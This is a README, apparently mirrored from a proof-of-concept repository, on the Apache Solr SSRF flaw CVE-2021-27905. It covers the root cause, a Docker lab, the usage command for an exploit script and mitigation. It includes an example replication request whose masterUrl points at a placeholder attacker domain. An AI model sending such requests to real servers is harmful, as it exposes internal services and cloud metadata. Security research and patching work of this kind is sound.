关联漏洞
标题:Apache Solr 代码问题漏洞 (CVE-2021-27905)Description:Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。
Description
Apache Solr < 8.8.2 Server Side Request Forgery
介绍
# CVE-2021-27905
| **Sr No** | **Title** |
| --------- | --------------------------------------------- |
| 1 | [Overview](#Overview) |
| 2 | [Root Cause](#Root%20Cause) |
| 3 | [Proof Of Concept](#Proof%20Of%20Concept) |
| 4 | [Mitigation (8.8.2+)](#Mitigation%20(8.8.2+)) |
| 5 | [Reference](#Reference) |
**For educational and research purposes only. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.**
## Overview
This is a Server Side Request Forgery vulnerability affecting **Apache Solr** (< 8.8.2) that allows remote attackers to make arbitrary HTTP requests to internal or external systems through the replication handler's `masterUrl` parameter, potentially exposing internal services or sensitive cloud metadata.
**Affected Versions** : All versions prior to `8.8.2` (`7.0.0 - 7.7.3, 8.0.0 - 8.8.1`)
## Root Cause
The replication mechanism in **Solr** lets a "replica" fetch index files from a "master/leader" by specifying a `masterUrl` or `leaderUrl` parameter. The URL pointed through this parameter isn't properly validated in the affected **Apache Solr** versions. So, it would allow attackers to convince the server to a remote resource that they choose.
**Vulnerable Flow**
- An attacker would send a request to an endpoint such as:
```
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>
```
**Solr**'s `ReplicationHandler` would:
1. Accept the request.
2. Use the provided `masterUrl` to download index data.
3. Internally make an HTTP call to that address.
## Proof Of Concept
**LAB SETUP**
- A lab can be setup locally using docker:
```shell
$ cd lab
$ docker compose up -d
# verify accessibility
$ curl http://127.0.0.1:8983/solr
```
- Cleanup
```shell
$ docker compose down
```
**EXPLOITATION**
- Setup a virtual environment:
```shell
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
```
- Install requirements:
```shell
$ pip install -r requirements.txt
```
- Run `cve-2021-27905.py`
```shell
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>
```
## Mitigation (8.8.2+)
Solr `ReplicationHandler` was patched to:
- Validate that `masterUrl`/`leaderUrl` points only to approved hosts.
- Restrict acceptable URL schemes (`http`, `https` only ).
- Harden remote streaming features.
- Recommend admins to secure `/replication` with auth or remove it entirely if unused.
### Reference
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80
---
文件快照
[4.0K] /data/pocs/08c95919af11685447b1898b544213de71ac15d0
├── [4.0K] attachments
│ └── [4.3M] poc.gif
├── [1.8K] cve-2021-27905.py
├── [4.0K] lab
│ └── [ 227] docker-compose.yml
├── [2.8K] README.md
└── [ 8] requirements.txt
3 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。